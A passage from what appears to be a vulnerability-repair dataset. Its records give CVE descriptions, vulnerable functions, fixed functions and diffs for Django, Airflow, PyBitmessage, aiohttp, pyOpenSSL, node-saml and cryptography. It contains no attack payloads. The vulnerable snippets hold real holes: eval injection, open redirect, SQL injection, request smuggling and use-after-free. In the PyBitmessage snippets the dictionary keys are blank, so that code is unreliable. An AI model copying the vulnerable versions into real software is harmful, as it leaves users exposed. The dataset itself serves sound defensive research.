'%(function)s(%(distinct)s%(expressions)s %(ordering)s)'\n allow_distinct = True\n\n def __init__(self, expression, delimiter, **extra):\n delimiter_expr = Value(str(delimiter))\n super().__init__(expression, delimiter_expr, **extra)\n\n def convert_value(self, value, expression, connection):\n if not value:\n return ''\n return value"}], "vul_patch": "--- a/django/contrib/postgres/aggregates/general.py\n+++ b/django/contrib/postgres/aggregates/general.py\n@@ -1,10 +1,11 @@\n class StringAgg(OrderableAggMixin, Aggregate):\n function = 'STRING_AGG'\n- template = \"%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)\"\n+ template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'\n allow_distinct = True\n \n def __init__(self, expression, delimiter, **extra):\n- super().__init__(expression, delimiter=delimiter, **extra)\n+ delimiter_expr = Value(str(delimiter))\n+ super().__init__(expression, delimiter_expr, **extra)\n \n def convert_value(self, value, expression, connection):\n if not value:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-43985", "cve_description": "In Apache Airflow versions prior to 2.4.2, there was an open redirect in the webserver's `/confirm` endpoint.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/9fb4814d29d934cef3b02fb3b2547f9fb76aaa97"], "programing_language": "Python", "vul_func": [{"id": "vul_go_177_1", "commit": "2987801", "file_path": "airflow/www/views.py", "start_line": 156, "end_line": 178, "snippet": "def get_safe_url(url):\n \"\"\"Given a user-supplied URL, ensure it points to our web server\"\"\"\n valid_schemes = ['http', 'https', '']\n valid_netlocs = [request.host, '']\n\n if not url:\n return url_for('Airflow.index')\n\n parsed = urlparse(url)\n\n # If the url contains semicolon, redirect it to homepage 
to avoid\n # potential XSS. (Similar to https://github.com/python/cpython/pull/24297/files (bpo-42967))\n if ';' in unquote(url):\n return url_for('Airflow.index')\n\n query = parse_qsl(parsed.query, keep_blank_values=True)\n\n url = parsed._replace(query=urlencode(query)).geturl()\n\n if parsed.scheme in valid_schemes and parsed.netloc in valid_netlocs:\n return url\n\n return url_for('Airflow.index')"}], "fix_func": [{"id": "fix_go_177_1", "commit": "9fb4814", "file_path": "airflow/www/views.py", "start_line": 156, "end_line": 172, "snippet": "def get_safe_url(url):\n \"\"\"Given a user-supplied URL, ensure it points to our web server\"\"\"\n if not url:\n return url_for('Airflow.index')\n\n # If the url contains semicolon, redirect it to homepage to avoid\n # potential XSS. (Similar to https://github.com/python/cpython/pull/24297/files (bpo-42967))\n if ';' in unquote(url):\n return url_for('Airflow.index')\n\n host_url = urlsplit(request.host_url)\n redirect_url = urlsplit(urljoin(request.host_url, url))\n if not (redirect_url.scheme in (\"http\", \"https\") and host_url.netloc == redirect_url.netloc):\n return url_for('Airflow.index')\n\n # This will ensure we only redirect to the right scheme/netloc\n return redirect_url.geturl()"}], "vul_patch": "--- a/airflow/www/views.py\n+++ b/airflow/www/views.py\n@@ -1,23 +1,17 @@\n def get_safe_url(url):\n \"\"\"Given a user-supplied URL, ensure it points to our web server\"\"\"\n- valid_schemes = ['http', 'https', '']\n- valid_netlocs = [request.host, '']\n-\n if not url:\n return url_for('Airflow.index')\n-\n- parsed = urlparse(url)\n \n # If the url contains semicolon, redirect it to homepage to avoid\n # potential XSS. (Similar to https://github.com/python/cpython/pull/24297/files (bpo-42967))\n if ';' in unquote(url):\n return url_for('Airflow.index')\n \n- query = parse_qsl(parsed.query, keep_blank_values=True)\n+ host_url = urlsplit(request.host_url)\n+ redirect_url = urlsplit(urljoin(request.host_url, url))\n+ if not (redirect_url.scheme in (\"http\", \"https\") and host_url.netloc == redirect_url.netloc):\n+ return url_for('Airflow.index')\n \n- url = parsed._replace(query=urlencode(query)).geturl()\n-\n- if parsed.scheme in valid_schemes and parsed.netloc in valid_netlocs:\n- return url\n-\n- return url_for('Airflow.index')\n+ # This will ensure we only redirect to the right scheme/netloc\n+ return redirect_url.geturl()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-1000070", "cve_description": "Bitmessage PyBitmessage version v0.6.2 (and introduced in or after commit 8ce72d8d2d25973b7064b1cf76a6b0b3d62f0ba0) contains a Eval injection vulnerability in main program, file src/messagetypes/__init__.py function constructObject that can result in Code Execution. This attack appears to be exploitable via remote attacker using a malformed message which must be processed by the victim - e.g. arrive from any sender on bitmessage network. 
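Note on the CVE-2020-7471 record above: the fix stops string-formatting the delimiter into the SQL template and instead wraps it in Value(), so the ORM binds it as a query parameter. The same principle at the DB-API level, using sqlite3's group_concat as a runnable stand-in for PostgreSQL's STRING_AGG (illustrative only, not Django code):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE t (v TEXT)")
conn.executemany("INSERT INTO t VALUES (?)", [("a",), ("b",)])

delimiter = "'); DROP TABLE t; --"  # hostile user input
# Unsafe: "SELECT group_concat(v, '%s') FROM t" % delimiter
row = conn.execute("SELECT group_concat(v, ?) FROM t", (delimiter,)).fetchone()
print(row[0])  # the delimiter is treated as data, not as SQL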
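Note on the CVE-2022-43985 record above: the patched get_safe_url resolves the candidate URL against the server's own host URL and then requires both an http(s) scheme and a matching netloc. A framework-free Python restatement (the real function also bounces URLs containing a semicolon and reads Flask's request.host_url):

from urllib.parse import urljoin, urlsplit

def safe_redirect_target(url: str, host_url: str, fallback: str = "/") -> str:
    if not url:
        return fallback
    host = urlsplit(host_url)
    redirect = urlsplit(urljoin(host_url, url))
    # urljoin pins relative paths to our host; absolute and
    # protocol-relative URLs keep their own netloc and fail the check.
    if redirect.scheme in ("http", "https") and redirect.netloc == host.netloc:
        return redirect.geturl()
    return fallback

assert safe_redirect_target("/home", "https://airflow.example/") == "https://airflow.example/home"
assert safe_redirect_target("https://evil.example/", "https://airflow.example/") == "/"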
This vulnerability appears to have been fixed in v0.6.3.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/Bitmessage/PyBitmessage", "patch_url": ["https://github.com/Bitmessage/PyBitmessage/commit/3a8016d31f517775d226aa8b902480f4a3a148a9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_342_1", "commit": "96ea36cfd245f7dc10209b01278b5fa2970f360c", "file_path": "src/messagetypes/__init__.py", "start_line": 13, "end_line": 29, "snippet": "def constructObject(data):\n try:\n classBase = eval(data[\"\"] + \".\" + data[\"\"].title())\n except NameError:\n logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"])\n return None\n try:\n returnObj = classBase()\n returnObj.decode(data)\n except KeyError as e:\n logger.error(\"Missing mandatory key %s\", e)\n return None\n except:\n logger.error(\"classBase fail\", exc_info=True)\n return None\n else:\n return returnObj"}], "fix_func": [{"id": "fix_py_342_1", "commit": "3a8016d31f517775d226aa8b902480f4a3a148a9", "file_path": "src/messagetypes/__init__.py", "start_line": 13, "end_line": 30, "snippet": "def constructObject(data):\n try:\n m = import_module(\"messagetypes.\" + data[\"\"])\n classBase = getattr(m, data[\"\"].title())\n except (NameError, ImportError):\n logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"], exc_info=True)\n return None\n try:\n returnObj = classBase()\n returnObj.decode(data)\n except KeyError as e:\n logger.error(\"Missing mandatory key %s\", e)\n return None\n except:\n logger.error(\"classBase fail\", exc_info=True)\n return None\n else:\n return returnObj"}], "vul_patch": "--- a/src/messagetypes/__init__.py\n+++ b/src/messagetypes/__init__.py\n@@ -1,8 +1,9 @@\n def constructObject(data):\n try:\n- classBase = eval(data[\"\"] + \".\" + data[\"\"].title())\n- except NameError:\n- logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"])\n+ m = import_module(\"messagetypes.\" + data[\"\"])\n+ classBase = getattr(m, data[\"\"].title())\n+ except (NameError, ImportError):\n+ logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"], exc_info=True)\n return None\n try:\n returnObj = classBase()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-47641", "cve_description": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Affected versions of aiohttp have a security vulnerability regarding the inconsistent interpretation of the http protocol. HTTP/1.1 is a persistent protocol, if both Content-Length(CL) and Transfer-Encoding(TE) header values are present it can lead to incorrect interpretation of two entities that parse the HTTP and we can poison other sockets with this incorrect interpretation. A possible Proof-of-Concept (POC) would be a configuration with a reverse proxy(frontend) that accepts both CL and TE headers and aiohttp as backend. As aiohttp parses anything with chunked, we can pass a chunked123 as TE, the frontend entity will ignore this header and will parse Content-Length. 
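Note on the CVE-2018-1000070 record above: eval() over a network-supplied type name is arbitrary code execution; the fix resolves the class through import_module plus getattr, confining lookups to the messagetypes package. A simplified sketch (the message key name is elided in the record, so "type" here is a hypothetical stand-in):

from importlib import import_module

def construct_object(data: dict):
    try:
        module = import_module("messagetypes." + data["type"])  # "type" key is hypothetical
        cls = getattr(module, data["type"].title())
    except (KeyError, ImportError, AttributeError):
        return None  # unknown or malformed message type: fail closed
    obj = cls()
    obj.decode(data)
    return obj

print(construct_object({"type": "nosuch"}))  # None: the lookup fails closed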
The impact of this vulnerability is that it is possible to bypass any proxy rule, poisoning sockets to other users like passing Authentication Headers, also if it is present an Open Redirect an attacker could combine it to redirect random users to another website and log the request. This vulnerability has been addressed in release 3.8.0 of aiohttp. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-444": {"name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", "description": "The product acts as an intermediary HTTP agent\n (such as a proxy or firewall) in the data flow between two\n entities such as a client and server, but it does not\n interpret malformed HTTP requests or responses in ways that\n are consistent with how the messages will be processed by\n those entities that are at the ultimate destination."}}, "repo": "https://github.com/aio-libs/aiohttp", "patch_url": ["https://github.com/aio-libs/aiohttp/commit/f016f0680e4ace6742b03a70cb0382ce86abe371"], "programing_language": "Python", "vul_func": [{"id": "vul_py_103_1", "commit": "a8f01d7", "file_path": "aiohttp/http_parser.py", "start_line": "456", "end_line": "495", "snippet": " def parse_headers(\n self, lines: List[bytes]\n ) -> Tuple[\n \"CIMultiDictProxy[str]\", RawHeaders, Optional[bool], Optional[str], bool, bool\n ]:\n \"\"\"Parses RFC 5322 headers from a stream.\n\n Line continuations are supported. Returns list of header name\n and value pairs. Header name is in upper case.\n \"\"\"\n headers, raw_headers = self._headers_parser.parse_headers(lines)\n close_conn = None\n encoding = None\n upgrade = False\n chunked = False\n\n # keep-alive\n conn = headers.get(hdrs.CONNECTION)\n if conn:\n v = conn.lower()\n if v == \"close\":\n close_conn = True\n elif v == \"keep-alive\":\n close_conn = False\n elif v == \"upgrade\":\n upgrade = True\n\n # encoding\n enc = headers.get(hdrs.CONTENT_ENCODING)\n if enc:\n enc = enc.lower()\n if enc in (\"gzip\", \"deflate\", \"br\"):\n encoding = enc\n\n # chunking\n te = headers.get(hdrs.TRANSFER_ENCODING)\n if te and \"chunked\" in te.lower():\n chunked = True\n\n return (headers, raw_headers, close_conn, encoding, upgrade, chunked)"}], "fix_func": [{"id": "fix_py_103_1", "commit": "f016f06", "file_path": "aiohttp/http_parser.py", "start_line": "457", "end_line": "503", "snippet": " def parse_headers(\n self, lines: List[bytes]\n ) -> Tuple[\n \"CIMultiDictProxy[str]\", RawHeaders, Optional[bool], Optional[str], bool, bool\n ]:\n \"\"\"Parses RFC 5322 headers from a stream.\n\n Line continuations are supported. Returns list of header name\n and value pairs. 
Header name is in upper case.\n \"\"\"\n headers, raw_headers = self._headers_parser.parse_headers(lines)\n close_conn = None\n encoding = None\n upgrade = False\n chunked = False\n\n # keep-alive\n conn = headers.get(hdrs.CONNECTION)\n if conn:\n v = conn.lower()\n if v == \"close\":\n close_conn = True\n elif v == \"keep-alive\":\n close_conn = False\n elif v == \"upgrade\":\n upgrade = True\n\n # encoding\n enc = headers.get(hdrs.CONTENT_ENCODING)\n if enc:\n enc = enc.lower()\n if enc in (\"gzip\", \"deflate\", \"br\"):\n encoding = enc\n\n # chunking\n te = headers.get(hdrs.TRANSFER_ENCODING)\n if te is not None:\n te_lower = te.lower()\n if \"chunked\" in te_lower:\n chunked = True\n\n if hdrs.CONTENT_LENGTH in headers:\n raise BadHttpMessage(\n \"Content-Length can't be present with Transfer-Encoding\",\n )\n\n return (headers, raw_headers, close_conn, encoding, upgrade, chunked)"}], "vul_patch": "--- a/aiohttp/http_parser.py\n+++ b/aiohttp/http_parser.py\n@@ -34,7 +34,14 @@\n \n # chunking\n te = headers.get(hdrs.TRANSFER_ENCODING)\n- if te and \"chunked\" in te.lower():\n- chunked = True\n+ if te is not None:\n+ te_lower = te.lower()\n+ if \"chunked\" in te_lower:\n+ chunked = True\n+\n+ if hdrs.CONTENT_LENGTH in headers:\n+ raise BadHttpMessage(\n+ \"Content-Length can't be present with Transfer-Encoding\",\n+ )\n \n return (headers, raw_headers, close_conn, encoding, upgrade, chunked)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-1000807", "cve_description": "Python Cryptographic Authority pyopenssl version prior to version 17.5.0 contains a CWE-416: Use After Free vulnerability in X509 object handling that can result in Use after free can lead to possible denial of service or remote code execution.. This attack appear to be exploitable via Depends on the calling application and if it retains a reference to the memory.. This vulnerability appears to have been fixed in 17.5.0.", "cwe_info": {"CWE-416": {"name": "Use After Free", "description": "The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. 
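Note on the CVE-2023-47641 record above: the parser change turns a Content-Length plus Transfer-Encoding conflict into a hard error instead of silently honoring whichever header a front-end proxy prefers. A minimal header-level sketch (plain dict for brevity; aiohttp itself uses a case-insensitive multidict):

def body_is_chunked(headers: dict) -> bool:
    te = headers.get("Transfer-Encoding")
    if te is not None and "Content-Length" in headers:
        # RFC 7230 section 3.3.3: conflicting framing headers are a
        # request-smuggling vector; fail instead of guessing.
        raise ValueError("Content-Length can't be present with Transfer-Encoding")
    return te is not None and "chunked" in te.lower()

assert body_is_chunked({"Transfer-Encoding": "chunked"})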
Any operations using the original pointer are no longer valid because the memory \"belongs\" to the code that operates on the new pointer."}}, "repo": "https://github.com/pyca/pyopenssl", "patch_url": ["https://github.com/pyca/pyopenssl/commit/e73818600065821d588af475b024f4eb518c3509"], "programing_language": "Python", "vul_func": [{"id": "vul_py_426_1", "commit": "f724786", "file_path": "src/OpenSSL/SSL.py", "start_line": 311, "end_line": 336, "snippet": " def wrapper(ok, store_ctx):\n cert = X509.__new__(X509)\n cert._x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n error_number = _lib.X509_STORE_CTX_get_error(store_ctx)\n error_depth = _lib.X509_STORE_CTX_get_error_depth(store_ctx)\n\n index = _lib.SSL_get_ex_data_X509_STORE_CTX_idx()\n ssl = _lib.X509_STORE_CTX_get_ex_data(store_ctx, index)\n connection = Connection._reverse_mapping[ssl]\n\n try:\n result = callback(\n connection, cert, error_number, error_depth, ok\n )\n except Exception as e:\n self._problems.append(e)\n return 0\n else:\n if result:\n _lib.X509_STORE_CTX_set_error(store_ctx, _lib.X509_V_OK)\n return 1\n else:\n return 0\n\n self.callback = _ffi.callback(\n \"int (*)(int, X509_STORE_CTX *)\", wrapper)"}, {"id": "vul_py_426_2", "commit": "f724786", "file_path": "src/OpenSSL/crypto.py", "start_line": 3006, "end_line": 3087, "snippet": "def load_pkcs12(buffer, passphrase=None):\n \"\"\"\n Load a PKCS12 object from a buffer\n\n :param buffer: The buffer the certificate is stored in\n :param passphrase: (Optional) The password to decrypt the PKCS12 lump\n :returns: The PKCS12 object\n \"\"\"\n passphrase = _text_to_bytes_and_warn(\"passphrase\", passphrase)\n\n if isinstance(buffer, _text_type):\n buffer = buffer.encode(\"ascii\")\n\n bio = _new_mem_buf(buffer)\n\n # Use null passphrase if passphrase is None or empty string. With PKCS#12\n # password based encryption no password and a zero length password are two\n # different things, but OpenSSL implementation will try both to figure out\n # which one works.\n if not passphrase:\n passphrase = _ffi.NULL\n\n p12 = _lib.d2i_PKCS12_bio(bio, _ffi.NULL)\n if p12 == _ffi.NULL:\n _raise_current_error()\n p12 = _ffi.gc(p12, _lib.PKCS12_free)\n\n pkey = _ffi.new(\"EVP_PKEY**\")\n cert = _ffi.new(\"X509**\")\n cacerts = _ffi.new(\"Cryptography_STACK_OF_X509**\")\n\n parse_result = _lib.PKCS12_parse(p12, passphrase, pkey, cert, cacerts)\n if not parse_result:\n _raise_current_error()\n\n cacerts = _ffi.gc(cacerts[0], _lib.sk_X509_free)\n\n # openssl 1.0.0 sometimes leaves an X509_check_private_key error in the\n # queue for no particular reason. This error isn't interesting to anyone\n # outside this function. It's not even interesting to us. 
Get rid of it.\n try:\n _raise_current_error()\n except Error:\n pass\n\n if pkey[0] == _ffi.NULL:\n pykey = None\n else:\n pykey = PKey.__new__(PKey)\n pykey._pkey = _ffi.gc(pkey[0], _lib.EVP_PKEY_free)\n\n if cert[0] == _ffi.NULL:\n pycert = None\n friendlyname = None\n else:\n pycert = X509.__new__(X509)\n pycert._x509 = _ffi.gc(cert[0], _lib.X509_free)\n\n friendlyname_length = _ffi.new(\"int*\")\n friendlyname_buffer = _lib.X509_alias_get0(\n cert[0], friendlyname_length\n )\n friendlyname = _ffi.buffer(\n friendlyname_buffer, friendlyname_length[0]\n )[:]\n if friendlyname_buffer == _ffi.NULL:\n friendlyname = None\n\n pycacerts = []\n for i in range(_lib.sk_X509_num(cacerts)):\n pycacert = X509.__new__(X509)\n pycacert._x509 = _lib.sk_X509_value(cacerts, i)\n pycacerts.append(pycacert)\n if not pycacerts:\n pycacerts = None\n\n pkcs12 = PKCS12.__new__(PKCS12)\n pkcs12._pkey = pykey\n pkcs12._cert = pycert\n pkcs12._cacerts = pycacerts\n pkcs12._friendlyname = friendlyname\n return pkcs12"}], "fix_func": [{"id": "fix_py_426_1", "commit": "e73818600065821d588af475b024f4eb518c3509", "file_path": "src/OpenSSL/SSL.py", "start_line": 311, "end_line": 337, "snippet": " def wrapper(ok, store_ctx):\n x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n _lib.X509_up_ref(x509)\n cert = X509._from_raw_x509_ptr(x509)\n error_number = _lib.X509_STORE_CTX_get_error(store_ctx)\n error_depth = _lib.X509_STORE_CTX_get_error_depth(store_ctx)\n\n index = _lib.SSL_get_ex_data_X509_STORE_CTX_idx()\n ssl = _lib.X509_STORE_CTX_get_ex_data(store_ctx, index)\n connection = Connection._reverse_mapping[ssl]\n\n try:\n result = callback(\n connection, cert, error_number, error_depth, ok\n )\n except Exception as e:\n self._problems.append(e)\n return 0\n else:\n if result:\n _lib.X509_STORE_CTX_set_error(store_ctx, _lib.X509_V_OK)\n return 1\n else:\n return 0\n\n self.callback = _ffi.callback(\n \"int (*)(int, X509_STORE_CTX *)\", wrapper)"}, {"id": "fix_py_426_2", "commit": "e73818600065821d588af475b024f4eb518c3509", "file_path": "src/OpenSSL/crypto.py", "start_line": 3006, "end_line": 3086, "snippet": "def load_pkcs12(buffer, passphrase=None):\n \"\"\"\n Load a PKCS12 object from a buffer\n\n :param buffer: The buffer the certificate is stored in\n :param passphrase: (Optional) The password to decrypt the PKCS12 lump\n :returns: The PKCS12 object\n \"\"\"\n passphrase = _text_to_bytes_and_warn(\"passphrase\", passphrase)\n\n if isinstance(buffer, _text_type):\n buffer = buffer.encode(\"ascii\")\n\n bio = _new_mem_buf(buffer)\n\n # Use null passphrase if passphrase is None or empty string. With PKCS#12\n # password based encryption no password and a zero length password are two\n # different things, but OpenSSL implementation will try both to figure out\n # which one works.\n if not passphrase:\n passphrase = _ffi.NULL\n\n p12 = _lib.d2i_PKCS12_bio(bio, _ffi.NULL)\n if p12 == _ffi.NULL:\n _raise_current_error()\n p12 = _ffi.gc(p12, _lib.PKCS12_free)\n\n pkey = _ffi.new(\"EVP_PKEY**\")\n cert = _ffi.new(\"X509**\")\n cacerts = _ffi.new(\"Cryptography_STACK_OF_X509**\")\n\n parse_result = _lib.PKCS12_parse(p12, passphrase, pkey, cert, cacerts)\n if not parse_result:\n _raise_current_error()\n\n cacerts = _ffi.gc(cacerts[0], _lib.sk_X509_free)\n\n # openssl 1.0.0 sometimes leaves an X509_check_private_key error in the\n # queue for no particular reason. This error isn't interesting to anyone\n # outside this function. It's not even interesting to us. 
Get rid of it.\n try:\n _raise_current_error()\n except Error:\n pass\n\n if pkey[0] == _ffi.NULL:\n pykey = None\n else:\n pykey = PKey.__new__(PKey)\n pykey._pkey = _ffi.gc(pkey[0], _lib.EVP_PKEY_free)\n\n if cert[0] == _ffi.NULL:\n pycert = None\n friendlyname = None\n else:\n pycert = X509._from_raw_x509_ptr(cert[0])\n\n friendlyname_length = _ffi.new(\"int*\")\n friendlyname_buffer = _lib.X509_alias_get0(\n cert[0], friendlyname_length\n )\n friendlyname = _ffi.buffer(\n friendlyname_buffer, friendlyname_length[0]\n )[:]\n if friendlyname_buffer == _ffi.NULL:\n friendlyname = None\n\n pycacerts = []\n for i in range(_lib.sk_X509_num(cacerts)):\n x509 = _lib.sk_X509_value(cacerts, i)\n pycacert = X509._from_raw_x509_ptr(x509)\n pycacerts.append(pycacert)\n if not pycacerts:\n pycacerts = None\n\n pkcs12 = PKCS12.__new__(PKCS12)\n pkcs12._pkey = pykey\n pkcs12._cert = pycert\n pkcs12._cacerts = pycacerts\n pkcs12._friendlyname = friendlyname\n return pkcs12"}], "vul_patch": "--- a/src/OpenSSL/SSL.py\n+++ b/src/OpenSSL/SSL.py\n@@ -1,6 +1,7 @@\n def wrapper(ok, store_ctx):\n- cert = X509.__new__(X509)\n- cert._x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n+ x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n+ _lib.X509_up_ref(x509)\n+ cert = X509._from_raw_x509_ptr(x509)\n error_number = _lib.X509_STORE_CTX_get_error(store_ctx)\n error_depth = _lib.X509_STORE_CTX_get_error_depth(store_ctx)\n \n\n--- a/src/OpenSSL/crypto.py\n+++ b/src/OpenSSL/crypto.py\n@@ -53,8 +53,7 @@\n pycert = None\n friendlyname = None\n else:\n- pycert = X509.__new__(X509)\n- pycert._x509 = _ffi.gc(cert[0], _lib.X509_free)\n+ pycert = X509._from_raw_x509_ptr(cert[0])\n \n friendlyname_length = _ffi.new(\"int*\")\n friendlyname_buffer = _lib.X509_alias_get0(\n@@ -68,8 +67,8 @@\n \n pycacerts = []\n for i in range(_lib.sk_X509_num(cacerts)):\n- pycacert = X509.__new__(X509)\n- pycacert._x509 = _lib.sk_X509_value(cacerts, i)\n+ x509 = _lib.sk_X509_value(cacerts, i)\n+ pycacert = X509._from_raw_x509_ptr(x509)\n pycacerts.append(pycacert)\n if not pycacerts:\n pycacerts = None\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-40178", "cve_description": "Node-SAML is a SAML library not dependent on any frameworks that runs in Node. The lack of checking of current timestamp allows a LogoutRequest XML to be reused multiple times even when the current time is past the NotOnOrAfter. This could impact the user where they would be logged out from an expired LogoutRequest. In bigger contexts, if LogoutRequests are sent out in mass to different SPs, this could impact many users on a large scale. 
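Note on the CVE-2018-1000807 record above: X509_STORE_CTX_get_current_cert returns a borrowed pointer, so wrapping it in a garbage-collected Python object creates a second owner and one free too many; the fix takes its own reference via X509_up_ref first. A toy refcount model of why that works (pure Python, no OpenSSL):

class Native:
    def __init__(self):
        self.refs = 1
    def up_ref(self):
        self.refs += 1
    def free(self):
        assert self.refs > 0, "double free / use after free"
        self.refs -= 1

class OwningWrapper:
    def __init__(self, native: Native, borrowed: bool):
        if borrowed:
            native.up_ref()  # the patched behaviour
        self.native = native
    def release(self):
        self.native.free()   # stand-in for the _ffi.gc destructor

cert = Native()                      # owned by the X509_STORE_CTX
wrapper = OwningWrapper(cert, borrowed=True)
wrapper.release()                    # the wrapper drops its reference
cert.free()                          # the store drops the original one
assert cert.refs == 0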
This issue was patched in version 4.0.5.\n", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/node-saml/node-saml", "patch_url": ["https://github.com/node-saml/node-saml/commit/045e3b9c54211fdb95f96edf363679845b195cec"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_218_1", "commit": "58495fe", "file_path": "src/saml.ts", "start_line": 1262, "end_line": 1298, "snippet": " protected async processValidlySignedPostRequestAsync(\n this: SAML,\n doc: XMLOutput,\n dom: Document,\n ): Promise<{ profile: Profile; loggedOut: boolean }> {\n const request = doc.LogoutRequest;\n if (request) {\n const profile = {} as Profile;\n if (request.$.ID) {\n profile.ID = request.$.ID;\n } else {\n throw new Error(\"Missing SAML LogoutRequest ID\");\n }\n const issuer = request.Issuer;\n if (issuer && issuer[0]._) {\n profile.issuer = issuer[0]._;\n } else {\n throw new Error(\"Missing SAML issuer\");\n }\n const nameID = await getNameIdAsync(dom, this.options.decryptionPvk ?? null);\n if (nameID.value) {\n profile.nameID = nameID.value;\n if (nameID.format) {\n profile.nameIDFormat = nameID.format;\n }\n } else {\n throw new Error(\"Missing SAML NameID\");\n }\n const sessionIndex = request.SessionIndex;\n if (sessionIndex) {\n profile.sessionIndex = sessionIndex[0]._;\n }\n return { profile, loggedOut: true };\n } else {\n throw new Error(\"Unknown SAML request message\");\n }\n }"}], "fix_func": [{"id": "fix_js_218_1", "commit": "045e3b9c54211fdb95f96edf363679845b195cec", "file_path": "src/saml.ts", "start_line": 1262, "end_line": 1299, "snippet": " protected async processValidlySignedPostRequestAsync(\n this: SAML,\n doc: XMLOutput,\n dom: Document,\n ): Promise<{ profile: Profile; loggedOut: boolean }> {\n const request = doc.LogoutRequest;\n this.verifyLogoutRequest(doc);\n if (request) {\n const profile = {} as Profile;\n if (request.$.ID) {\n profile.ID = request.$.ID;\n } else {\n throw new Error(\"Missing SAML LogoutRequest ID\");\n }\n const issuer = request.Issuer;\n if (issuer && issuer[0]._) {\n profile.issuer = issuer[0]._;\n } else {\n throw new Error(\"Missing SAML issuer\");\n }\n const nameID = await getNameIdAsync(dom, this.options.decryptionPvk ?? null);\n if (nameID.value) {\n profile.nameID = nameID.value;\n if (nameID.format) {\n profile.nameIDFormat = nameID.format;\n }\n } else {\n throw new Error(\"Missing SAML NameID\");\n }\n const sessionIndex = request.SessionIndex;\n if (sessionIndex) {\n profile.sessionIndex = sessionIndex[0]._;\n }\n return { profile, loggedOut: true };\n } else {\n throw new Error(\"Unknown SAML request message\");\n }\n }"}], "vul_patch": "--- a/src/saml.ts\n+++ b/src/saml.ts\n@@ -4,6 +4,7 @@\n dom: Document,\n ): Promise<{ profile: Profile; loggedOut: boolean }> {\n const request = doc.LogoutRequest;\n+ this.verifyLogoutRequest(doc);\n if (request) {\n const profile = {} as Profile;\n if (request.$.ID) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-26130", "cve_description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. 
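Note on the CVE-2023-40178 record above: the patch inserts a verifyLogoutRequest(doc) call whose body is not included in the record; per the advisory it validates the request's NotOnOrAfter against the current time so an expired LogoutRequest cannot be replayed. A Python sketch of that kind of check (hypothetical helper, not the node-saml code):

from datetime import datetime, timezone

def assert_logout_request_fresh(not_on_or_after: str) -> None:
    # SAML timestamps are ISO 8601, e.g. "2023-08-15T12:00:00Z".
    deadline = datetime.fromisoformat(not_on_or_after.replace("Z", "+00:00"))
    if datetime.now(timezone.utc) >= deadline:
        raise ValueError("LogoutRequest expired: NotOnOrAfter has passed")

assert_logout_request_fresh("2999-01-01T00:00:00Z")  # far future: accepted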
Starting in version 38.0.0 and prior to version 42.0.4, if `pkcs12.serialize_key_and_certificates` is called with both a certificate whose public key did not match the provided private key and an `encryption_algorithm` with `hmac_hash` set (via `PrivateFormat.PKCS12.encryption_builder().hmac_hash(...)`, then a NULL pointer dereference would occur, crashing the Python process. This has been resolved in version 42.0.4, the first version in which a `ValueError` is properly raised.", "cwe_info": {"CWE-476": {"name": "NULL Pointer Dereference", "description": "The product dereferences a pointer that it expects to be valid but is NULL."}}, "repo": "https://github.com/pyca/cryptography", "patch_url": ["https://github.com/pyca/cryptography/commit/97d231672763cdb5959a3b191e692a362f1b9e55"], "programing_language": "Python", "vul_func": [{"id": "vul_py_427_1", "commit": "4398f19", "file_path": "src/cryptography/hazmat/backends/openssl/backend.py", "start_line": 491, "end_line": 647, "snippet": " def serialize_key_and_certificates_to_pkcs12(\n self,\n name: bytes | None,\n key: PKCS12PrivateKeyTypes | None,\n cert: x509.Certificate | None,\n cas: list[_PKCS12CATypes] | None,\n encryption_algorithm: serialization.KeySerializationEncryption,\n ) -> bytes:\n password = None\n if name is not None:\n utils._check_bytes(\"name\", name)\n\n if isinstance(encryption_algorithm, serialization.NoEncryption):\n nid_cert = -1\n nid_key = -1\n pkcs12_iter = 0\n mac_iter = 0\n mac_alg = self._ffi.NULL\n elif isinstance(\n encryption_algorithm, serialization.BestAvailableEncryption\n ):\n # PKCS12 encryption is hopeless trash and can never be fixed.\n # OpenSSL 3 supports PBESv2, but Libre and Boring do not, so\n # we use PBESv1 with 3DES on the older paths.\n if rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n nid_cert = 